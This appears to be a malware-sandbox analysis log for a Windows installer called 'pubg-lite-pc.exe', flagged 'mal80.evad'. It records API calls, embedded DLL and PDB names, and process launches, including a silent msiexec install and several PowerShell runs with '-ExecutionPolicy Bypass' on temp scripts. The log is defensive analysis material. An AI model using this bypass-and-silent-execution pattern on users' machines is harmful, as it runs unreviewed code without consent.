Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009793D0 NtdllDefWindowProc_W,GetWindowLongW,SetWindowLongW,GetWindowLongW,SetWindowLongW,1_2_009793D0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0092D460 GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,1_2_0092D460
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00961540 ShowWindow,ShowWindow,GetWindowLongW,SetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,SetWindowLongW,GetWindowLongW,SetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,SetWindowLongW,GetWindowLongW,SetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,SetWindowLongW,GetWindowRect,SendMessageW,1_2_00961540
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00949740 CreateWindowExW,NtdllDefWindowProc_W,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetWindowRect,SendMessageW,SendMessageW,SendMessageW,1_2_00949740
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0096F740 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,SendMessageW,SetWindowPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,1_2_0096F740
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0092DA10 SysFreeString,GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,NtdllDefWindowProc_W,SysFreeString,1_2_0092DA10
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0092FEF0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow,1_2_0092FEF0
Source: pubg-lite-pc.exe, 00000001.00000003.64936421311.00000000014D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDecoder.dllF vs pubg-lite-pc.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelzmaextractor.dllF vs pubg-lite-pc.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs pubg-lite-pc.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs pubg-lite-pc.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameaischeduler.dllF vs pubg-lite-pc.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrereq.dllF vs pubg-lite-pc.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs pubg-lite-pc.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFileOperations.dllF vs pubg-lite-pc.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameembeddeduiproxy.dllF vs pubg-lite-pc.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameInstallerAnalytics.dllF vs pubg-lite-pc.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameembeddeduiproxy.dllF vs pubg-lite-pc.exe
Source: pubg-lite-pc.exe, 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenameInstallerAnalytics.dllF vs pubg-lite-pc.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64957498013.0000000005F83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs pubg-lite-pc.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64935364855.00000000014D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDecoder.dllF vs pubg-lite-pc.exe
Source: pubg-lite-pc.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\pubg-lite-pc.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeSection loaded: lpk.dllJump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: pubg-lite-pc.exeStatic PE information: invalid certificate
Source: pubg-lite-pc.exeVirustotal: Detection: 17%
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile read: C:\Users\user\Desktop\pubg-lite-pc.exeJump to behavior
Source: pubg-lite-pc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pubg-lite-pc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\pubg-lite-pc.exe "C:\Users\user\Desktop\pubg-lite-pc.exe"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E82FFD10FEB1CBA14CC59B611B5F4838 C
Source: C:\Users\user\Desktop\pubg-lite-pc.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\Common Apps\1.3.5\1BA8BE5\pubg-lite-pc.msi" MSIINSTALLPERUSER=1 ALLUSERS=2 /qn AI_SETUPEXEPATH=C:\Users\user\Desktop\pubg-lite-pc.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1660097954 " AI_EUIMSI="
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 974E8FDD22F5719B9917619AF3E37DCB
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1D88.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1D27.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1D28.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1D29.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7419.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi73B8.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr73B9.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr73BA.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE5D4.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE5A2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE5A3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE5A4.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss3EE5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3EB4.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3EB5.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3EB6.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssA352.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiA310.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrA311.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrA312.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pubg-lite-pc.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\Common Apps\1.3.5\1BA8BE5\pubg-lite-pc.msi" MSIINSTALLPERUSER=1 ALLUSERS=2 /qn AI_SETUPEXEPATH=C:\Users\user\Desktop\pubg-lite-pc.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1660097954 " AI_EUIMSI="Jump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E82FFD10FEB1CBA14CC59B611B5F4838 CJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 974E8FDD22F5719B9917619AF3E37DCBJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1D88.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1D27.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1D28.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1D29.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7419.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi73B8.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr73B9.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr73BA.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE5D4.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE5A2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE5A3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE5A4.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss3EE5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3EB4.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3EB5.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3EB6.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssA352.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiA310.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrA311.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrA312.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile created: C:\Users\user\AppData\Local\AdvinstAnalyticsJump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile created: C:\Users\user\AppData\Local\Temp\Common AppsJump to behavior
Source: classification engineClassification label: mal80.evad.winEXE@23/66@3/1
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009DB9D0 GetDiskFreeSpaceExW,1_2_009DB9D0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009B6F00 FormatMessageW,GetLastError,1_2_009B6F00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:304:WilStaging_02
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00935230 LoadResource,LockResource,SizeofResource,1_2_00935230
Source: pubg-lite-pc.exeString found in binary or memory: https://installeranalytics.com
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile written: C:\Users\user\AppData\Local\AdvinstAnalytics\617ebaa6a255ac1179c4d852\1.3.5\tracking.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: pubg-lite-pc.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: pubg-lite-pc.exeStatic file information: File size 3361288 > 1048576
Source: pubg-lite-pc.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x17ca00
Source: pubg-lite-pc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: pubg-lite-pc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: pubg-lite-pc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: pubg-lite-pc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: pubg-lite-pc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: pubg-lite-pc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: pubg-lite-pc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: pubg-lite-pc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wininet.pdb source: pubg-lite-pc.exe, 00000001.00000003.64957498013.0000000005F83000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbdll source: powershell.exe, 00000007.00000002.65296318896.0000020D99A66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb source: pubg-lite-pc.exe, 00000001.00000003.64935232297.00000000014DB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb, source: powershell.exe, 00000018.00000003.65913647336.0000024B7ABE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb2 source: pubg-lite-pc.exe, 00000001.00000003.64935232297.00000000014DB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\bin\x86\embeddeduiproxy.pdb source: pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb\ source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbj source: powershell.exe, 00000016.00000003.65647796522.000002B419BD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automationlib.pdb source: powershell.exe, 00000016.00000003.65653971086.000002B47F99C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.65297522924.0000020D99ACA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000003.65650615625.000002B419E30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.66086099097.0000024B7ABE6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.65913103767.0000024B7ABC2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.65913647336.0000024B7ABE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbRoot source: powershell.exe, 00000007.00000003.65205693106.0000020D996DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbs& source: powershell.exe, 00000007.00000002.65297824816.0000020D99AE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdbl source: pubg-lite-pc.exe, 00000001.00000000.64931774401.0000000000A9E000.00000002.00000001.01000000.00000003.sdmp, pubg-lite-pc.exe, 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: n.pdb~ source: powershell.exe, 00000007.00000002.65297824816.0000020D99AE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66221989496.0000000005F80000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbG{y source: powershell.exe, 00000016.00000003.65651850982.000002B419E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdb source: pubg-lite-pc.exe, 00000001.00000000.64931774401.0000000000A9E000.00000002.00000001.01000000.00000003.sdmp, pubg-lite-pc.exe, 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbB source: powershell.exe, 00000018.00000003.65913647336.0000024B7ABE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbq source: powershell.exe, 00000007.00000002.65296318896.0000020D99A66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.65297824816.0000020D99AE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb1&0 source: powershell.exe, 00000016.00000003.65651850982.000002B419E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.65818234743.000002B419B65000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.65918521662.0000024B7AC01000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.65913647336.0000024B7ABE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdbe source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdbT source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000016.00000003.65649868815.000002B419DFB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbW source: powershell.exe, 00000018.00000002.66080950626.0000024B7A86B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wininet.pdbUGP source: pubg-lite-pc.exe, 00000001.00000003.64957498013.0000000005F83000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdb source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbg source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66221989496.0000000005F80000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb| source: powershell.exe, 00000016.00000003.65647796522.000002B419BD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdboot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\Ap source: powershell.exe, 00000018.00000003.65913647336.0000024B7ABE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000016.00000003.65651272704.000002B419E52000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65822692856.000002B419E5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdb source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.65296318896.0000020D99A66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbt1&0 source: powershell.exe, 00000016.00000003.65651850982.000002B419E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbpdblib.pdb|A source: powershell.exe, 00000007.00000003.65205693106.0000020D996DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.65293854575.0000020D9973A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdbu source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: ion.pdbx source: powershell.exe, 00000007.00000002.65297824816.0000020D99AE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000007.00000003.65205693106.0000020D996DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000003.65647796522.000002B419BD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000016.00000003.65647796522.000002B419BD0000.00000004.00000020.00020000.00000000.sdmp
